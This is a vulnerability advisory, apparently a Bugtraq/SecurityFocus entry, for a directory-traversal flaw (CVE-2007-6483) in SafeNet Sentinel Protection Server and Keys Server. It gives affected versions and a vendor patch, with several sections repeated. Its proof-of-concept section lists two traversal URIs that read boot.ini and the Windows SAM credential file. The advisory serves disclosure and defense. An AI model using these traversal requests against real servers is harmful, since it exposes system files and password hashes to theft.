Sentinel Protection Server/Keys Server Directory Traversal Vulnerability
BID:26583
Info
Sentinel Protection Server/Keys Server Directory Traversal Vulnerability
| Bugtraq ID: | 26583 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-6483 |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 26 2007 12:00AM |
| Updated: | May 07 2015 05:34PM |
| Credit: | Corey Lebleu and Elliot Kendall independently discovered this vulnerability. |
| Vulnerable: |
Safenet-Inc Sentinel Protection Server 7.4 Safenet-Inc Sentinel Protection Server 7.3 Safenet-Inc Sentinel Protection Server 7.2 Safenet-Inc Sentinel Protection Server 7.1 Safenet-Inc Sentinel Protection Server 7.0 Safenet-Inc Sentinel Keys Server 1.0.3 |
| Not Vulnerable: |
Safenet-Inc Sentinel Protection Server 7.4.1 Safenet-Inc Sentinel Keys Server 1.0.4 |
Discussion
Sentinel Protection Server/Keys Server Directory Traversal Vulnerability
Sentinel Protection Server and Keys Server are prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.
Exploiting this issue may allow an attacker to access sensitive information that could aid in further attacks.
This issue affects Protection Server 7.0.0 through 7.4.0, and Keys Server 1.0.3; earlier versions may also be vulnerable.
Sentinel Protection Server and Keys Server are prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.
Exploiting this issue may allow an attacker to access sensitive information that could aid in further attacks.
This issue affects Protection Server 7.0.0 through 7.4.0, and Keys Server 1.0.3; earlier versions may also be vulnerable.
Exploit / POC
Sentinel Protection Server/Keys Server Directory Traversal Vulnerability
The following proof-of-concept URI are available:
http://www.example.com:6002/../../../../../../boot.ini
http://www.example.com:7002/../../../../../../winnt/repair/sam
The following proof-of-concept URI are available:
http://www.example.com:6002/../../../../../../boot.ini
http://www.example.com:7002/../../../../../../winnt/repair/sam
Solution / Fix
Sentinel Protection Server/Keys Server Directory Traversal Vulnerability
Solution:
The vendor has released updates to address this issue. Contact the vendor for details on obtaining and applying the appropriate updates.
Safenet-Inc Sentinel Protection Server 7.4
Solution:
The vendor has released updates to address this issue. Contact the vendor for details on obtaining and applying the appropriate updates.
Safenet-Inc Sentinel Protection Server 7.4
-
SafeNet SPI740SecurityPatch.zip
http://safenet-inc.com/support/files/SPI740SecurityPatch.zip
References
Sentinel Protection Server/Keys Server Directory Traversal Vulnerability
References:
References: